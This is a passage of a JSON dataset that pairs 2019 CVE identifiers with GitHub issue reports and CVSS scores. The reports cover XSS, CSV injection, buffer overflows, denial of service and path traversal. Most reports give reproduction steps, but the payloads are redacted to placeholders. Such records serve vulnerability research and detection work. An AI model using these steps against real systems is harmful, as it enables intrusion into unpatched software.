revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.",
  34797. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  34798. "severity": "HIGH",
  34799. "baseScore": 8.1,
  34800. "impactScore": 5.2,
  34801. "exploitabilityScore": 2.8
  34802. },
  34803. {
  34804. "CVE_ID": "CVE-2019-11632",
  34805. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5528",
  34806. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5528",
  34807. "Repo_new": "octopusdeploy/issues",
  34808. "Issue_Created_At": "2019-05-01T05:11:04Z",
  34809. "description": "Variable APITAG permissions don't comply with project scoping. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . FILETAG NUMBERTAG Create another unrelated project (eg Foo NUMBERTAG Configure a separate user that has the following permissions The APITAG Contributor\" role scoped to FILETAG You can only view the one variable in APITAG FILETAG In NUMBERTAG failing) With this permissions setup FILETAG You can view all unscoped variables in APITAG FILETAG Details These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected. Affected versions of Octopus Server APITAG APITAG (inclusive), and APITAG APITAG (inclusive) Workarounds There is no known way of preserving the same access control that existed before this regression was introduced. Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the ERRORTAG and ERRORTAG permissions are revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.",
  34810. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  34811. "severity": "HIGH",
  34812. "baseScore": 8.1,
  34813. "impactScore": 5.2,
  34814. "exploitabilityScore": 2.8
  34815. },
  34816. {
  34817. "CVE_ID": "CVE-2019-11633",
  34818. "Issue_Url_old": "https://github.com/dustyfresh/HoneyPress/issues/1",
  34819. "Issue_Url_new": "https://github.com/dustyfresh/honeypress/issues/1",
  34820. "Repo_new": "dustyfresh/HoneyPress",
  34821. "Issue_Created_At": "2019-05-01T09:36:36Z",
  34822. "description": "Fingerprinting. Honeypress can be fingerprinted by attackers because of the ingrained unique hostnames within the APITAG templates. \" FILETAG \" \" FILETAG \"",
  34823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34824. "severity": "HIGH",
  34825. "baseScore": 7.5,
  34826. "impactScore": 3.6,
  34827. "exploitabilityScore": 3.9
  34828. },
  34829. {
  34830. "CVE_ID": "CVE-2019-11636",
  34831. "Issue_Url_old": "https://github.com/zcash/zcash/issues/3955",
  34832. "Issue_Url_new": "https://github.com/zcash/zcash/issues/3955",
  34833. "Repo_new": "zcash/zcash",
  34834. "Issue_Created_At": "2019-04-16T22:38:26Z",
  34835. "description": "Denial of Service. Scaling discussions don\u2019t make sense unless the ultimately goal is to reduce the likelihood that users will not be able to use Zcash because of a lack of service. There are lots of ways to fill up our service currently. When we spot them, we should link them to this epic. A small number of shielded transaction of massive size. A small number of or many transactions with many empty outputs. Many small transactions filling the mempool currently crash the nodes that receive them. It\u2019s possible to knock nodes offline Transaction expiry helps reduce the cost for an attacker. Additionally, the failure mode is currently catastrophic. Filling the mempool currently results in a node crash. With such an attack, someone might be able to knock over mining pool operators, and thus significantly drop the hashpower of the network, facilitating a NUMBERTAG attack. Suggested course of action: Set limits on the mempool size, and reject further transactions Other steps that result in the reduction of the likelihood of a successful APITAG attack",
  34836. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34837. "severity": "HIGH",
  34838. "baseScore": 7.5,
  34839. "impactScore": 3.6,
  34840. "exploitabilityScore": 3.9
  34841. },
  34842. {
  34843. "CVE_ID": "CVE-2019-11641",
  34844. "Issue_Url_old": "https://github.com/threatstream/agave/issues/1",
  34845. "Issue_Url_new": "https://github.com/pwnlandia/agave/issues/1",
  34846. "Repo_new": "pwnlandia/agave",
  34847. "Issue_Created_At": "2019-05-01T11:18:28Z",
  34848. "description": "Fingerprinting. Agave fails to avoid fingerprinting by including its own name within HTML templates.",
  34849. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34850. "severity": "HIGH",
  34851. "baseScore": 7.5,
  34852. "impactScore": 3.6,
  34853. "exploitabilityScore": 3.9
  34854. },
  34855. {
  34856. "CVE_ID": "CVE-2019-11770",
  34857. "Issue_Url_old": "https://github.com/eclipse/buildship/issues/855",
  34858. "Issue_Url_new": "https://github.com/eclipse/buildship/issues/855",
  34859. "Repo_new": "eclipse/buildship",
  34860. "Issue_Created_At": "2019-02-18T21:04:48Z",
  34861. "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common: See: URLTAG URLTAG Source Locations: Download of Eclipse SDK: URLTAG URLTAG Eclipse SDK has no checksum verification: URLTAG Download of Gradle: URLTAG",
  34862. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34863. "severity": "HIGH",
  34864. "baseScore": 8.1,
  34865. "impactScore": 5.9,
  34866. "exploitabilityScore": 2.2
  34867. },
  34868. {
  34869. "CVE_ID": "CVE-2019-11808",
  34870. "Issue_Url_old": "https://github.com/ratpack/ratpack/issues/1448",
  34871. "Issue_Url_new": "https://github.com/ratpack/ratpack/issues/1448",
  34872. "Repo_new": "ratpack/ratpack",
  34873. "Issue_Created_At": "2019-04-23T01:51:49Z",
  34874. "description": "Use UUID directly for generating session IDs.",
  34875. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  34876. "severity": "LOW",
  34877. "baseScore": 3.7,
  34878. "impactScore": 1.4,
  34879. "exploitabilityScore": 2.2
  34880. },
  34881. {
  34882. "CVE_ID": "CVE-2019-11818",
  34883. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/635",
  34884. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/635",
  34885. "Repo_new": "alkacon/opencms-core",
  34886. "Issue_Created_At": "2019-04-08T08:22:14Z",
  34887. "description": "Cross Site Scripting NUMBERTAG New User. Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG and before. Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. Impacted URL is FILETAG Steps to reproduce NUMBERTAG Browse to Quick Launch > Account Management > User Management > New User NUMBERTAG Insert APITAG in First Name and Last Name field. APITAG NUMBERTAG Inserted APITAG payload will be executed on all pages where user information is displayed such as user confirmation, user list, user view etc. APITAG Version details: APITAG Best Regards URLTAG varchashva [at] gmail [dot] com",
  34888. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34889. "severity": "MEDIUM",
  34890. "baseScore": 6.1,
  34891. "impactScore": 2.7,
  34892. "exploitabilityScore": 2.8
  34893. },
  34894. {
  34895. "CVE_ID": "CVE-2019-11819",
  34896. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/636",
  34897. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/636",
  34898. "Repo_new": "alkacon/opencms-core",
  34899. "Issue_Created_At": "2019-04-08T10:36:24Z",
  34900. "description": "CSV Injection NUMBERTAG New User. Hello Team, I would like to report a vulnerability (CSV Injection) which I have observed in current version NUMBERTAG and before. When a spreadsheet program such as Microsoft Excel or APITAG Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVETAG Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website Exfiltrating contents from the spreadsheet, or other open spreadsheets. Please refer URLTAG for more details. Impacted URL is FILETAG Steps to reproduce NUMBERTAG Browse to Quick Launch > Account Management > User Management > New User Insert APITAG in First Name and Last Name field APITAG NUMBERTAG Now export all user information in CSV by using export feature in application. Quick Launch > Account Management > User Management > Export User NUMBERTAG Once user opens the affected CSV file, payload will be triggered APITAG APITAG Version Details: APITAG Best Regards URLTAG varchashva [at] gmail [dot] com",
  34901. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34902. "severity": "HIGH",
  34903. "baseScore": 7.8,
  34904. "impactScore": 5.9,
  34905. "exploitabilityScore": 1.8
  34906. },
  34907. {
  34908. "CVE_ID": "CVE-2019-11834",
  34909. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/337",
  34910. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/337",
  34911. "Repo_new": "davegamble/cjson",
  34912. "Issue_Created_At": "2019-02-21T03:29:14Z",
  34913. "description": "APITAG cross border read&write NUMBERTAG FILETAG NUMBERTAG can bypass NUMBERTAG bug can be trigger with json string buffer that end with NUMBERTAG or not ERRORTAG test demo, compile at ubuntu NUMBERTAG cause stackoverflow\uff1a ERRORTAG",
  34914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34915. "severity": "CRITICAL",
  34916. "baseScore": 9.8,
  34917. "impactScore": 5.9,
  34918. "exploitabilityScore": 3.9
  34919. },
  34920. {
  34921. "CVE_ID": "CVE-2019-11835",
  34922. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/338",
  34923. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/338",
  34924. "Repo_new": "davegamble/cjson",
  34925. "Issue_Created_At": "2019-02-21T03:56:18Z",
  34926. "description": "APITAG cross border read&write NUMBERTAG FILETAG NUMBERTAG this bug can delete NUMBERTAG cross border read&write, and if use str API result will fault, cause some logical problem, such as stack&heapoverflow, leak info etc.. CODETAG this should be code as below: CODETAG just leak stack data for test server.c CODETAG client iP: APITAG prot NUMBERTAG recv bufdata = / abcdefghjklmn After APITAG bufdata: APITAG `",
  34927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34928. "severity": "CRITICAL",
  34929. "baseScore": 9.8,
  34930. "impactScore": 5.9,
  34931. "exploitabilityScore": 3.9
  34932. },
  34933. {
  34934. "CVE_ID": "CVE-2019-11837",
  34935. "Issue_Url_old": "https://github.com/nginx/njs/issues/155",
  34936. "Issue_Url_new": "https://github.com/nginx/njs/issues/155",
  34937. "Repo_new": "nginx/njs",
  34938. "Issue_Created_At": "2019-05-07T18:38:36Z",
  34939. "description": "Segfault in APITAG for negative arguments.. ERRORTAG",
  34940. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34941. "severity": "HIGH",
  34942. "baseScore": 7.5,
  34943. "impactScore": 3.6,
  34944. "exploitabilityScore": 3.9
  34945. },
  34946. {
  34947. "CVE_ID": "CVE-2019-11838",
  34948. "Issue_Url_old": "https://github.com/nginx/njs/issues/153",
  34949. "Issue_Url_new": "https://github.com/nginx/njs/issues/153",
  34950. "Repo_new": "nginx/njs",
  34951. "Issue_Created_At": "2019-05-07T17:43:35Z",
  34952. "description": "heap buffer overflow in APITAG APITAG ERRORTAG Probably is the same as NUMBERTAG array struct corruption while resizing). Minified test from fluff URLTAG report.",
  34953. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34954. "severity": "CRITICAL",
  34955. "baseScore": 9.8,
  34956. "impactScore": 5.9,
  34957. "exploitabilityScore": 3.9
  34958. },
  34959. {
  34960. "CVE_ID": "CVE-2019-11839",
  34961. "Issue_Url_old": "https://github.com/nginx/njs/issues/152",
  34962. "Issue_Url_new": "https://github.com/nginx/njs/issues/152",
  34963. "Repo_new": "nginx/njs",
  34964. "Issue_Created_At": "2019-05-07T17:30:56Z",
  34965. "description": "heap buffer overflow in APITAG APITAG ERRORTAG Minified test from fluff URLTAG report.",
  34966. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34967. "severity": "CRITICAL",
  34968. "baseScore": 9.8,
  34969. "impactScore": 5.9,
  34970. "exploitabilityScore": 3.9
  34971. },
  34972. {
  34973. "CVE_ID": "CVE-2019-11840",
  34974. "Issue_Url_old": "https://github.com/golang/go/issues/30965",
  34975. "Issue_Url_new": "https://github.com/golang/go/issues/30965",
  34976. "Repo_new": "golang/go",
  34977. "Issue_Created_At": "2019-03-20T22:32:56Z",
  34978. "description": "PATHTAG keystream loop in amd NUMBERTAG implementation after APITAG If more than NUMBERTAG APITAG of keystream is generated, or if the counter otherwise grows greater than NUMBERTAG bits, the amd NUMBERTAG implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to predictability in CSPRNG applications. The issue might affect uses of PATHTAG with extremely large messages. Architectures other than amd NUMBERTAG and uses that generate less than NUMBERTAG APITAG of keystream for a single APITAG invocation are unaffected. This issue was discovered and reported by Michael APITAG",
  34979. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34980. "severity": "MEDIUM",
  34981. "baseScore": 5.9,
  34982. "impactScore": 3.6,
  34983. "exploitabilityScore": 2.2
  34984. },
  34985. {
  34986. "CVE_ID": "CVE-2019-11870",
  34987. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/598",
  34988. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/598",
  34989. "Repo_new": "s9y/serendipity",
  34990. "Issue_Created_At": "2019-03-07T14:35:55Z",
  34991. "description": "XSS via exiftag. The attached file contains an XSS payload as the camera model EXIF tag. Uploading it to s9y and looking at the details of the file will execute. The exif tag printing should be escaped. APITAG this is only self xss, there are situations where this could still be exploited, imagine someone sending a photo to someone else for a blogpost.) FILETAG",
  34992. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34993. "severity": "MEDIUM",
  34994. "baseScore": 6.1,
  34995. "impactScore": 2.7,
  34996. "exploitabilityScore": 2.8
  34997. },
  34998. {
  34999. "CVE_ID": "CVE-2019-11881",
  35000. "Issue_Url_old": "https://github.com/rancher/rancher/issues/20216",
  35001. "Issue_Url_new": "https://github.com/rancher/rancher/issues/20216",
  35002. "Repo_new": "rancher/rancher",
  35003. "Issue_Created_At": "2019-05-13T23:21:30Z",
  35004. "description": "Web Parameter Tampering on APITAG APITAG What kind of request is this ( PATHTAG request): Enhancement Steps to reproduce (least amount of steps as possible): Access the following endpoint on any Rancher instance up to NUMBERTAG URLTAG APITAG Result: It will display a link to OWASP Wiki explaining Web Parameter Tampering. Other details that may be helpful: Tags are effectively filtered. Environment information Rancher version ( APITAG / APITAG image tag or shown bottom left in the UI NUMBERTAG Installation option (single install/HA): APITAG Cluster information Cluster type APITAG PATHTAG ): Machine type ( PATHTAG ) and specifications (CPU/memory): Kubernetes version (use kubectl version ): APITAG Docker version (use docker version ): APITAG",
  35005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
  35006. "severity": "MEDIUM",
  35007. "baseScore": 4.7,
  35008. "impactScore": 1.4,
  35009. "exploitabilityScore": 2.8
  35010. },
  35011. {
  35012. "CVE_ID": "CVE-2019-12041",
  35013. "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/331",
  35014. "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/331",
  35015. "Repo_new": "jonschlinkert/remarkable",
  35016. "Issue_Created_At": "2019-05-13T10:39:02Z",
  35017. "description": "APITAG Regex APITAG vulnerability in parsing html tag. If you guys are not familiar with this type of bug, here is the detail explanation: URLTAG Vulnerable line of code: URLTAG APITAG CODETAG This will hang forever due to the regex matching of CDATA tag.",
  35018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35019. "severity": "HIGH",
  35020. "baseScore": 7.5,
  35021. "impactScore": 3.6,
  35022. "exploitabilityScore": 3.9
  35023. },
  35024. {
  35025. "CVE_ID": "CVE-2019-12043",
  35026. "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/332",
  35027. "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/332",
  35028. "Repo_new": "jonschlinkert/remarkable",
  35029. "Issue_Created_At": "2019-05-13T12:15:57Z",
  35030. "description": "APITAG bad url bypass, could lead to XSS. Hi, check out this reported issue URLTAG Im able to bypass the bad url check, implemented here URLTAG CODETAG It will generate output like this APITAG Which could pop up an alert when user clicks into it. Fix: maybe we can strip unprintable character around the url scheme?",
  35031. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35032. "severity": "MEDIUM",
  35033. "baseScore": 6.1,
  35034. "impactScore": 2.7,
  35035. "exploitabilityScore": 2.8
  35036. },
  35037. {
  35038. "CVE_ID": "CVE-2019-12047",
  35039. "Issue_Url_old": "https://github.com/getgridea/gridea/issues/105",
  35040. "Issue_Url_new": "https://github.com/getgridea/gridea/issues/105",
  35041. "Repo_new": "getgridea/gridea",
  35042. "Issue_Created_At": "2019-05-13T05:48:39Z",
  35043. "description": "Vulnerability: XSS to RCE. Hi, I found an XSS vulnerability that can cause RCE. And I recorded a GIF URLTAG to demonstrate controlling the local win NUMBERTAG through this vulnerability. Cause of vulnerability The post content editing area does not filter or prevent the running of js script, resulting in the use of XSS to call Nodejs module ( for example: APITAG ) to achieve arbitrary code execution. If the user imports content containing malicious code, the vulnerability will be triggered. Payload ERRORTAG",
  35044. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35045. "severity": "MEDIUM",
  35046. "baseScore": 6.1,
  35047. "impactScore": 2.7,
  35048. "exploitabilityScore": 2.8
  35049. },
  35050. {
  35051. "CVE_ID": "CVE-2019-12086",
  35052. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2326",
  35053. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2326",
  35054. "Repo_new": "fasterxml/jackson-databind",
  35055. "Issue_Created_At": "2019-05-11T17:31:34Z",
  35056. "description": "Possible new CVE wrt Polymorphic typing (placeholder). A new potential CVE via Polymorphic Typing has been reported: this issue is a placeholder until CVE assigned, problem evaluated. Affects all versions released up to and including NUMBERTAG",
  35057. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  35058. "severity": "HIGH",
  35059. "baseScore": 7.5,
  35060. "impactScore": 3.6,
  35061. "exploitabilityScore": 3.9
  35062. },
  35063. {
  35064. "CVE_ID": "CVE-2019-12101",
  35065. "Issue_Url_old": "https://github.com/darconeous/libnyoci/issues/21",
  35066. "Issue_Url_new": "https://github.com/darconeous/libnyoci/issues/21",
  35067. "Repo_new": "darconeous/libnyoci",
  35068. "Issue_Created_At": "2019-05-14T15:18:38Z",
  35069. "description": "There is a logical defect that causes a denial of service vulnerability. PATHTAG lines NUMBERTAG len = ( buffer NUMBERTAG F); switch(( buffer NUMBERTAG default: if(key) key += ( buffer NUMBERTAG buffer NUMBERTAG break; case NUMBERTAG buffer NUMBERTAG if(key) key NUMBERTAG buffer; buffer NUMBERTAG break; case NUMBERTAG buffer NUMBERTAG if(key) key NUMBERTAG buffer FILETAG Then the function coap_decode_option will set the length parameter to NUMBERTAG and the value_len in the function nyoci_inbound_option_strequal in PATHTAG is NUMBERTAG lines NUMBERTAG CODETAG If value_len is NUMBERTAG the subsequent loop is not executed (line NUMBERTAG and if the second argument cstr is an empty string, the return value is true (normal logic will return false in the loop) The function APITAG in PATHTAG for handling requests calls APITAG , and the second argument passed in is an empty string(lines NUMBERTAG CODETAG Therefore, the special data packet will pass the judgment, the program will enter the assignment to the variable prefix (the variable prefix is \u200b\u200bempty at this time), and the program eventually crashes. APITAG",
  35070. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35071. "severity": "HIGH",
  35072. "baseScore": 7.5,
  35073. "impactScore": 3.6,
  35074. "exploitabilityScore": 3.9
  35075. },
  35076. {
  35077. "CVE_ID": "CVE-2019-12105",
  35078. "Issue_Url_old": "https://github.com/Supervisor/supervisor/issues/1245",
  35079. "Issue_Url_new": "https://github.com/supervisor/supervisor/issues/1245",
  35080. "Repo_new": "supervisor/supervisor",
  35081. "Issue_Created_At": "2019-05-29T14:01:52Z",
  35082. "description": "[ CVETAG ] Unauthenticated user can read log files or restart a service. Luan Souza (luansouza. EMAILTAG ) wrote in email: > So, I was search for vulnerabites in my work company and I founded supervisord, it's a good service but the user don't need authetication for view logs ou restart a service, this is a called a misconfiguration, because some people put this online and anyone can acess, and view logs e restart services therefore I submmit to a CVE, they requered to contact the developer to see if will fix the bug and howmuch time is required needed to do. > > Best regards, > ERRORTAG",
  35083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  35084. "severity": "HIGH",
  35085. "baseScore": 8.2,
  35086. "impactScore": 4.2,
  35087. "exploitabilityScore": 3.9
  35088. },
  35089. {
  35090. "CVE_ID": "CVE-2019-12136",
  35091. "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/3007",
  35092. "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/3007",
  35093. "Repo_new": "boostio/boostnote-legacy",
  35094. "Issue_Created_At": "2019-05-14T03:56:09Z",
  35095. "description": "A xss on the newest version. XSS There is a xss in the newest version via a label named mermaid When we insert codes like this: APITAG we can see there is a xss in the latest version. FILETAG",
  35096. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35097. "severity": "MEDIUM",
  35098. "baseScore": 5.4,
  35099. "impactScore": 2.7,
  35100. "exploitabilityScore": 2.3
  35101. },
  35102. {
  35103. "CVE_ID": "CVE-2019-12137",
  35104. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2505",
  35105. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2505",
  35106. "Repo_new": "typora/typora-issues",
  35107. "Issue_Created_At": "2019-05-16T09:20:24Z",
  35108. "description": "Code Execution in Typora. Summary A local file path traversal issue exists in Typora version NUMBERTAG for APITAG which allows an attacker to execute arbitrary programs. Technical observation A crafted URI can be used in a note to perform this attack using PATHTAG as an argument or by traversing to any directory like ( PATHTAG ) Video APITAG FILETAG",
  35109. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35110. "severity": "HIGH",
  35111. "baseScore": 7.8,
  35112. "impactScore": 5.9,
  35113. "exploitabilityScore": 1.8
  35114. },
  35115. {
  35116. "CVE_ID": "CVE-2019-12138",
  35117. "Issue_Url_old": "https://github.com/MacDownApp/macdown/issues/1076",
  35118. "Issue_Url_new": "https://github.com/macdownapp/macdown/issues/1076",
  35119. "Repo_new": "macdownapp/macdown",
  35120. "Issue_Created_At": "2019-05-16T09:58:31Z",
  35121. "description": "Code Execution in Macdown. Summary A local file path traversal issue exists in Macdown version NUMBERTAG for APITAG which allows an attacker to execute arbitrary programs. Technical observation A crafted URI can be used in a note to perform this attack using PATHTAG as an argument or by traversing to any directory like ( PATHTAG ) Video APITAG FILETAG",
  35122. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35123. "severity": "HIGH",
  35124. "baseScore": 7.8,
  35125. "impactScore": 5.9,
  35126. "exploitabilityScore": 1.8
  35127. },
  35128. {
  35129. "CVE_ID": "CVE-2019-12158",
  35130. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/17",
  35131. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/17",
  35132. "Repo_new": "fekberg/gohttp",
  35133. "Issue_Created_At": "2019-05-17T06:16:24Z",
  35134. "description": "Heap Buffer Overflow when appending certain size string to URL file extension when compiled with ASAN.. Screen S Server APITAG CTRL A, D Screen S Crash curl APITAG CTRL A, D ASAN Details NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG efbb at pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffd9e6f3a NUMBERTAG sp NUMBERTAG ffd9e6f3a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG efbb thread T NUMBERTAG e NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG f NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG efbb is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG a NUMBERTAG in malloc ( PATHTAG NUMBERTAG f2c in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG f NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  35135. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35136. "severity": "CRITICAL",
  35137. "baseScore": 9.8,
  35138. "impactScore": 5.9,
  35139. "exploitabilityScore": 3.9
  35140. },
  35141. {
  35142. "CVE_ID": "CVE-2019-12159",
  35143. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/16",
  35144. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/16",
  35145. "Repo_new": "fekberg/gohttp",
  35146. "Issue_Created_At": "2019-05-17T06:11:38Z",
  35147. "description": "Stack Buffer Overflow when requesting excessively long URL when compiled with ASAN.. Screen S Server APITAG CTRL A, D Screen S Crash python c \"print 'A NUMBERTAG file curl APITAG file) CTRL A, D Screen R Server NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffcea NUMBERTAG b NUMBERTAG at pc NUMBERTAG fcfe NUMBERTAG b bp NUMBERTAG ffcea NUMBERTAG sp NUMBERTAG ffcea NUMBERTAG ff8 READ of size NUMBERTAG at NUMBERTAG ffcea NUMBERTAG b NUMBERTAG thread T NUMBERTAG fcfe NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c1 in scan ( PATHTAG NUMBERTAG c5 in APITAG ( PATHTAG NUMBERTAG in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG fcfe NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffcea NUMBERTAG b NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a0 in receive ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG buffer' APITAG NUMBERTAG d4a NUMBERTAG f3]f3 f3 f3 f3 f3 f3 f NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG a NUMBERTAG d4a NUMBERTAG b NUMBERTAG Shadow byte legend (one shadow byte 